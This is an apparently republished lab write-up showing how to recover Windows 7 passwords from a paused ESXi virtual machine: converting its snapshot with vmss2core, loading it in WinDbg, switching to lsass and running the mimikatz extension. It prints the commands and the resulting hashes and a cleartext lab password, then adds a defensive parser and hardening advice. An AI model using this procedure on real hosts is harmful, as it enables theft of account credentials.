[VM] Get Password from Virtual Machine Memory

Source: Internet | Published: [missing] | Editor: 程序博客网 | Time: 2024/05/18 16:54

Environment

Virtual Machines

Target VM: win7x86 (Build 7600), running on ESXi 5.0
Process VM (analysis machine): Windows 7 SP1 x86 Build 7601

Tools

Name               Version
vmss2core-Linux64  January 13, 2017, v1.0.1
WinDbg             6.11.0001.404 x86
WinSCP             5.9.3 Build 7136
mimilib.dll        win32, from mimikatz_trunk 2.1 (20160229)

Steps

Get the dump file

  1. Pause the running target VM.
  2. Copy vmss2core-Linux64 to the ESXi host (/vmfs/volumes/…/win7x86/) with WinSCP.
  3. Use vmss2core to convert win7x86-xxx.vmss into a dump file (memory.dmp).
  4. Copy memory.dmp to the Process VM (c:/vmss/) with WinSCP.

```
/vmfs/volumes/589af095-50718614-d536-005056881c2e/win7x86 # ./vmss2core-Linux64 -W7600 "win7x86-bfdbf0ed.vmss"
vmss2core version 8437677 Copyright (C) 1998-2017 VMware, Inc. All rights reserved.
Win32: found DDB at PA 0x2779be8
Win32: MmPfnDatabase=0x827b9700
Win32: PsLoadedModuleList=0x82799810
Win32: PsActiveProcessHead=0x82791e98
Win32: KiBugcheckData=0x827b1a00
Win32: KernBase=0x82651000
Win32: NtBuildLab=0x826a1068
CoreDumpScanWin32: MinorVersion set to 7600
... 10 MBs written.
... 20 MBs written.
... 30 MBs written.
...
... 1010 MBs written.
... 1020 MBs written.
Finished writing core.
```

Locate the lsass process

  1. Load the dump file into WinDbg (File -> Open Crash Dump).
  2. Load symbols with the following commands.
  3. Locate the lsass process and switch to its context with the following commands.

```
kd> .sympath SRV*c:\vmss\localsymbols*http://msdl.microsoft.com/download/symbols
Symbol search path is: SRV*c:\vmss\localsymbols*http://msdl.microsoft.com/download/symbols
Expanded Symbol search path is: srv*c:\vmss\localsymbols*http://msdl.microsoft.com/download/symbols
kd> .reload
Loading Kernel Symbols
...................................................
Loading User Symbols
...................................................
Loading unloaded module list
......
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for vmtools.dll -
```

```
kd> !process 0 0 lsass.exe
PROCESS 85d37a68  SessionId: 0  Cid: 0204    Peb: 7ffd8000  ParentCid: 0194
    DirBase: 3eab20e0  ObjectTable: 96371e60  HandleCount: 564.
    Image: lsass.exe
kd> .process /r /p 85d37a68
Implicit process is now 85d37a68
Loading User Symbols
..............................................................
```

Get the password

  1. Load the mimilib.dll extension.
  2. Run !mimikatz.

```
kd> .load C:\vmss\mimilib.dll

  .#####.   mimikatz 2.0 alpha (x86) built on Feb 29 2016 03:03:51
 .## ^ ##.  "A La Vie, A L'Amour" - Windows build 7600
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                  WinDBG extension ! * * */

===================================
#         * Kernel mode *         #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz

===================================
#          * User mode *          #
===================================
0:000> !mimikatz
===================================
```

```
kd> !mimikatz

DPAPI Backup keys
=================
Current prefered key:
Compatibility prefered key:

SekurLSA
========
Authentication Id : 0 ; 618511 (00000000:0009700f)
Session           : Interactive from 1
User Name         : WIN7X86EN
Domain            : WIN7X86EN-PC
Logon Server      : WIN7X86EN-PC
Logon Time        : 2/24/2017 1:19:20 AM
SID               : S-1-5-21-2794451615-1102251730-2481481344-1000
    msv :
     [00000003] Primary
     * Username : WIN7X86EN
     * Domain   : WIN7X86EN-PC
     * LM       : 16a5d217f7c9c7befdcfc2afb2d1be34
     * NTLM     : a91a49a72e7cf292cdad1bffdead9fd3
     * SHA1     : e4496b25c5afb22a92d28dadecb7d5873e920b6e
    tspkg :
     * Username : WIN7X86EN
     * Domain   : WIN7X86EN-PC
     * Password : mypassword
    wdigest :
     * Username : WIN7X86EN
     * Domain   : WIN7X86EN-PC
     * Password : mypassword
    kerberos :
     * Username : WIN7X86EN
     * Domain   : WIN7X86EN-PC
     * Password : mypassword
     * Key List
       aes256_hmac       <no size, buffer is incorrect>
       aes128_hmac       <no size, buffer is incorrect>
       rc4_hmac_nt       a91a49a72e7cf292cdad1bffdead9fd3
       rc4_hmac_old      a91a49a72e7cf292cdad1bffdead9fd3
       rc4_md4           a91a49a72e7cf292cdad1bffdead9fd3
       rc4_hmac_nt_exp   a91a49a72e7cf292cdad1bffdead9fd3
       rc4_hmac_old_exp  a91a49a72e7cf292cdad1bffdead9fd3
    ssp :
    masterkey :
    credman :
```
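The output above shows that a paused VM's snapshot file is as sensitive as the live LSASS process: once such a file is known to have been exposed, the defender's first question is which accounts need rotation and which providers were holding cleartext. The helper below, an added example that is not part of the original post or of mimikatz, parses sekurlsa output in the format shown above into a per-account exposure report; the sample text is constructed, modelled on the output above with placeholder hashes, and the function and field names are the author's own.

```python
import re
# Constructed sample modelled on the sekurlsa output above; hashes are placeholders.
SAMPLE = """\
Authentication Id : 0 ; 618511 (00000000:0009700f)
User Name         : WIN7X86EN
Domain            : WIN7X86EN-PC
    msv :
     * NTLM     : 0123456789abcdef0123456789abcdef
    tspkg :
     * Password : mypassword
    wdigest :
     * Password : mypassword
    kerberos :
     * Password : mypassword
Authentication Id : 0 ; 999 (00000000:000003e7)
User Name         : WIN7X86EN-PC$
Domain            : WORKGROUP
    msv :
     * NTLM     : fedcba9876543210fedcba9876543210
    wdigest :
     * Password : (null)
"""

def new_session():
    return {"user": "", "domain": "", "ntlm": "", "plaintext": []}  # plaintext: providers holding cleartext

def parse_sekurlsa(text):
    """Split sekurlsa output into logon sessions and record what each provider exposed."""
    sessions, provider = [], None
    for line in text.splitlines():
        if line.startswith("Authentication Id"):          # new logon session block
            sessions.append(new_session()); provider = None
        elif not sessions:
            continue
        elif (m := re.match(r"\s{4}(\w+) :\s*$", line)):   # provider header, e.g. "    wdigest :"
            provider = m.group(1)
        elif (m := re.match(r"(User Name|Domain)\s*:\s*(.*)$", line)):
            sessions[-1][m.group(1).split()[0].lower()] = m.group(2).strip()
        elif provider and (m := re.match(r"\s+\* (Password|NTLM)\s*:\s*(.*)$", line)):
            val = m.group(2).strip()
            if m.group(1) == "NTLM" and val:
                sessions[-1]["ntlm"] = val
            elif m.group(1) == "Password" and val and val != "(null)":
                sessions[-1]["plaintext"].append(provider)
    return sessions

def exposure_report(sessions):
    """Per account: providers that held the cleartext password, and whether an NTLM hash leaked."""
    return {f"{s['domain']}\\{s['user']}": {"plaintext": sorted(set(s["plaintext"])), "ntlm": bool(s["ntlm"])}
            for s in sessions if s["user"]}
```

Any account reported with a non-empty plaintext list was held in cleartext by tspkg, wdigest or kerberos inside LSASS, which on Windows 7 is the default behaviour until KB2871997 is installed and WDigest's UseLogonCredential value is set to 0; the .vmss/.vmsn/.vmem files on the datastore therefore deserve the same access controls and monitoring as a credential store.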

References

Mimikatz Against Virtual Machine Memory Part 1
Mimikatz Against Virtual Machine Memory Part 2
